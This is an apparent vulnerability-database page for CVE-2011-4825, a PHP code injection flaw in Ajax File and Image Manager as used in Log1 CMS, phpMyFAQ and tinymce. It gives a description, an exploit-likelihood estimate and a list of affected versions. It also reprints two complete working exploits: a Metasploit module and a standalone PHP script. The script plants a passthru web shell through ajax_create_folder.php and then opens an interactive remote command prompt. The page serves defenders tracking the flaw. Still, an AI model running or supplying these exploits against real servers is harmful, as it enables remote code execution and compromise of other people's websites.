CVE-2011-4825

high

Published 2011-12-15 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

Static code injection vulnerability in inc/function.base.php in Ajax File and Image Manager before 1.1, as used in tinymce before 1.4.2, phpMyFAQ 2.6 before 2.6.19 and 2.7 before 2.7.1, and possibly other products, allows remote attackers to inject arbitrary PHP code into data.php via crafted parameters.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18975 webapps php verified ruby · 3 KB

Metasploit · 2012-06-03

Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)

ruby exploit Source: Exploit-DB

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Log1 CMS writeInfo() PHP Code Injection",
			'Description'    => %q{
					This module exploits the "Ajax File and Image Manager" component that can be
				found in log1 CMS.  In function.base.php of this component, the 'data' parameter
				in writeInfo() allows any malicious user to have direct control of writing data
				to file data.php, which results in arbitrary remote code execution.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'EgiX',     #Found the bug in ajax_create_folder.php
					'Adel SBM', #Found log1 CMS using the vulnerable ajax_create_folder.php
					'sinn3r'    #Metasploit
				],
			'References'     =>
				[
					['CVE', '2011-4825'],
					['OSVDB', '76928'],
					['EDB', '18075'],  #Egix's advisory
					['EDB', '18151']   #Adel's
				],
			'Payload'        =>
				{
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none"
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        =>
				[
					['log1 CMS 2.0', {}],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Apr 11 2011",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The base path to log1 CMS', '/log1cms2.0/'])
			], self.class)
	end


	def check
		uri = target_uri.path
		uri << '/' if uri[-1, 1] != '/'

		res = send_request_raw({
			'method' => 'GET',
			'uri'    => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php"
		})

		if res and res.code == 200
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Safe
		end
	end


	def exploit
		uri = target_uri.path
		uri << '/' if uri[-1, 1] != '/'

		peer = "#{rhost}:#{rport}"
		php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>|

		print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)")
		send_request_cgi({
			'method' => 'POST',
			'uri'    => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php",
			'data'   => php
		})

		print_status("#{peer} - Requesting data.php")
		send_request_raw({
			'method' => 'GET',
			'uri'    => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php"
		})

		handler
	end
end

EDB-18151 webapps php php · 3 KB

Adel SBM · 2011-11-24

Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution

php exploit Source: Exploit-DB

<?php
/*
+-----------------------------------------------------------+
+ Log1CMS 2.0(ajax_create_folder.php) Remote Code Execution + 
+-----------------------------------------------------------+
  
Web-App        : Log1CMS 2.0
Vendor         : http://log1cms.sourceforge.net/
Vulnerability  : Remote Code Execution
Author         : Adel SBM
Website        : www.The-code.tk
Facebook       : http://www.facebook.com/profile.php?id=100002938082057
Google-Dork    : "POWERED BY LOG1 CMS"
Tested on      : Windows XP SP2
                         
+-----------------------------------------------------------+
+                     VIVE Algeria                          + 
+-----------------------------------------------------------+
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
 
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die( "\n[-] No Response From {$host}:80\n");
 
    fwrite($sock, $packet);
    return stream_get_contents($sock);
}
 
print "\n+------------------------------------------------------------------------+";
print "\n| Log1CMS 2.0  Remote Code Execution Exploit by Adel SBM                 |";
print "\n| SPl ThanX To: EgiX(exploit founder end coder)-The DoN                  |";
print "\n| Greetz to: Over-X & ind0ushka ..                                       |";
print "\n| TeaM Official website: www.The-code.tk                                 |";
print "\n| VIVE Algeria                                                           |";
print "\n+------------------------------------------------------------------------+\n";
 
if ($argc < 3)
{
print "\n+------------------------------------------------------------------------+";
print "\n| Usage......: php $argv[0] <host> <path>                                 |";
print "\n| Example....: php $argv[0] localhost /                                   |";
print "\n| Example....: php $argv[0] localhost /log1cms/                           |";
print "\n+------------------------------------------------------------------------+\n";
die();
}
 
$host = $argv[1];
$path = $argv[2];
 
$payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet  = "POST {$path}admin/libraries/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
 
http_send($host, $packet);
 
$packet  = "GET {$path}admin/libraries/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
 
while(1)
{
    print "\n@AdelSBM# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
    print $m[1] : die("\n[-] Exploit failed!\n");
}
 
?>

EDB-18084 webapps php verified

EgiX · 2011-11-05

PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution

Source code queued for fetch — refresh in a moment.

EDB-18083 webapps php verified

EgiX · 2011-11-05

ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution

Source code queued for fetch — refresh in a moment.

EDB-18085 webapps php verified

EgiX · 2011-11-05

aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution

Source code queued for fetch — refresh in a moment.

EDB-18075 webapps php verified

EgiX · 2011-11-04

Ajax File and Image Manager 1.0 Final - Remote Code Execution

Source code queued for fetch — refresh in a moment.

Metasploit modules

exploit_multi/http/log1cms_ajax_create_folder rank 600

Log1 CMS writeInfo() PHP Code Injection

Source fetch failed: fetch_error — view the original via the link above.

Application impact

Vendor	Product	Versions
phpletter	ajax_file_and_image_manager	`{"endIncluding":"1.0"}`
phpletter	ajax_file_and_image_manager	`0.5`
phpletter	ajax_file_and_image_manager	`0.5.5`
phpletter	ajax_file_and_image_manager	`0.5.7`
phpletter	ajax_file_and_image_manager	`0.6`
phpletter	ajax_file_and_image_manager	`0.6.12`
phpletter	ajax_file_and_image_manager	`0.7.8`
phpletter	ajax_file_and_image_manager	`0.7.10`
phpletter	ajax_file_and_image_manager	`0.8`
phpletter	ajax_file_and_image_manager	`0.8.8`
phpletter	ajax_file_and_image_manager	`0.8.9`
phpletter	ajax_file_and_image_manager	`0.8.24`
phpletter	ajax_file_and_image_manager	`0.9`
phpletter	ajax_file_and_image_manager	`1.0`
phpmyfaq	phpmyfaq	`2.6.0`
phpmyfaq	phpmyfaq	`2.6.1`
phpmyfaq	phpmyfaq	`2.6.2`
phpmyfaq	phpmyfaq	`2.6.3`
phpmyfaq	phpmyfaq	`2.6.4`
phpmyfaq	phpmyfaq	`2.6.5`
phpmyfaq	phpmyfaq	`2.6.6`
phpmyfaq	phpmyfaq	`2.6.7`
phpmyfaq	phpmyfaq	`2.6.8`
phpmyfaq	phpmyfaq	`2.6.9`
phpmyfaq	phpmyfaq	`2.6.10`
phpmyfaq	phpmyfaq	`2.6.11`
phpmyfaq	phpmyfaq	`2.6.12`
phpmyfaq	phpmyfaq	`2.6.13`
phpmyfaq	phpmyfaq	`2.6.14`
phpmyfaq	phpmyfaq	`2.6.15`
phpmyfaq	phpmyfaq	`2.6.16`
phpmyfaq	phpmyfaq	`2.6.17`
phpmyfaq	phpmyfaq	`2.6.18`
phpmyfaq	phpmyfaq	`2.7.0`
tinymce	tinymce	`{"endIncluding":"1.4.1"}`

References

CWEs

CWE-94

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.